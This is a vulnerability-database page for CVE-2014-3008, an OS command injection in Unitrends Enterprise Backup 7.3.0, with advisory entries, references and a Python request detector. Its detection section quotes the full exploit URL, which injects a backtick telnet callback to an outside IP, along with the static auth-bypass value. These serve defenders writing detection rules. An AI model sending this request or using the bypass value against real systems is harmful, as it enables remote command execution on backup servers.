CVE-2014-3008
Published 2014-04-28
Priority P2 · 61 · critical · 10 (CVSS 2.0)
AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 6.96% (93.3th percentile)
Unitrends Enterprise Backup 7.3.0 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the comm parameter to recoveryconsole/bpl/snmpd.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| unitrends | enterprise_backup | — | — |
Detection & IOCs (extracted from sources)
URL: POST /recoveryconsole/bpl/snmpd.php?type=update&sid=1&comm=notpublic`telnet+172.31.16.166+4444`&enabled=1&rx=4335379&ver=7.3.0&gcv=0
- Detect POST requests to /recoveryconsole/bpl/snmpd.php containing shell metacharacters (backticks, pipes, semicolons) in the 'comm' query parameter, indicating command injection attempts.
- Alert on the static, predictable auth value '1:/usr/bp/logs.dir/gui_root.log:100' (URL-encoded: 1%3A%2Fusr%2Fbp%2Flogs%2Edir%2Fgui%5Froot%2Elog%3A100) appearing in POST body to any endpoint, as it indicates exploitation of the non-random auth bypass.
- Flag requests where the 'comm' parameter value begins with 'notpublic' followed by backtick-enclosed commands, matching the exploit's injection pattern.
- Monitor for outbound telnet connections initiated from the Unitrends server process, consistent with the proof-of-concept callback payload.
- Inspect the Referer header for requests to snmpd.php; the exploit uses 'recoveryconsole/bpria/bin/bpria.swf' as referer, which may help correlate malicious sessions.
- The Metasploit module defaults to SSL (port 443); network detection rules must account for HTTPS traffic and may require SSL inspection to detect the malicious POST body.
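The HTTP-level checks listed above, combined into one detector, as an added example that is not from the sources indexed on this page. It assumes request fields that are already decrypted and parsed (for instance from a TLS-terminating proxy log); `inspect_request`, the finding labels, the `auth=` body field name and the `backup.example` host are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

TARGET_PATH = "/recoveryconsole/bpl/snmpd.php"
STATIC_AUTH = "1:/usr/bp/logs.dir/gui_root.log:100"   # static auth value quoted on this page
REFERER_HINT = "recoveryconsole/bpria/bin/bpria.swf"
SHELL_META = re.compile(r"[`|;]")              # backticks, pipes, semicolons
POC_SHAPE = re.compile(r"^notpublic`[^`]*`")   # 'notpublic' + backtick-enclosed command


def inspect_request(method, url, body="", referer=""):
    """Return detection findings for one HTTP request (fields already decrypted)."""
    findings = []
    parts = urlsplit(url)
    if method.upper() == "POST" and parts.path.lower().endswith(TARGET_PATH):
        # parse_qs percent-decodes, so an encoded backtick (%60) is caught as well
        query = parse_qs(parts.query, keep_blank_values=True, separator="&")
        for comm in query.get("comm", []):
            if SHELL_META.search(comm):
                findings.append("comm-shell-metachar")
            if POC_SHAPE.match(comm):
                findings.append("comm-notpublic-backtick")
        if REFERER_HINT in referer:
            findings.append("referer-bpria-swf")      # correlation signal only
    # The static auth value is suspicious in a body sent to any endpoint
    if STATIC_AUTH in unquote_plus(body):
        findings.append("static-auth-value")
    return findings


# Constructed sample requests: (method, URL, body, referer).
# The first URL is the one quoted on this page; body and referer host are made up.
SAMPLES = [
    ("POST", "/recoveryconsole/bpl/snmpd.php?type=update&sid=1&comm=notpublic"
             "`telnet+172.31.16.166+4444`&enabled=1&rx=4335379&ver=7.3.0&gcv=0",
     "auth=1%3A%2Fusr%2Fbp%2Flogs%2Edir%2Fgui%5Froot%2Elog%3A100",
     "https://backup.example/recoveryconsole/bpria/bin/bpria.swf"),
    ("POST", "/recoveryconsole/bpl/snmpd.php?type=update&sid=1&comm=public&enabled=1",
     "", ""),
]

if __name__ == "__main__":
    for method, url, body, referer in SAMPLES:
        print(method, url[:60], "->", inspect_request(method, url, body, referer) or "clean")
```

The outbound telnet indicator is a host or network-flow signal and is not covered by this request-level check.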
VulDB
Unitrends Enterprise Backup 7.3.0 comm os command injection (EDB-32885 / XFDB-92642)
vuldb·2026-05-12·CVSS 10.0
CVE-2014-3008 [CRITICAL] Unitrends Enterprise Backup 7.3.0 comm os command injection (EDB-32885 / XFDB-92642)
A vulnerability has been found in Unitrends Enterprise Backup 7.3.0 and classified as critical. This issue affects some unknown processing. Performing a manipulation of the argument comm results in os command injection.
This vulnerability was named CVE-2014-3008. The attack may be initiated remotely. In addition, an exploit is available.
GHSA
GHSA-h2r3-7m2h-5fxq: Unitrends Enterprise Backup 7
ghsa_unreviewed·2022-05-17
CVE-2014-3008 [HIGH] CWE-78 GHSA-h2r3-7m2h-5fxq: Unitrends Enterprise Backup 7
Unitrends Enterprise Backup 7.3.0 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the comm parameter to recoveryconsole/bpl/snmpd.php.
No detection rules found.
No writeups or analysis indexed.
References
- http://seclists.org/fulldisclosure/2014/Apr/204
- http://secunia.com/advisories/58001
- http://www.exploit-db.com/exploits/32885
- http://www.securityfocus.com/bid/66928
- https://exchange.xforce.ibmcloud.com/vulnerabilities/92642
- https://gist.github.com/brandonprry/10745756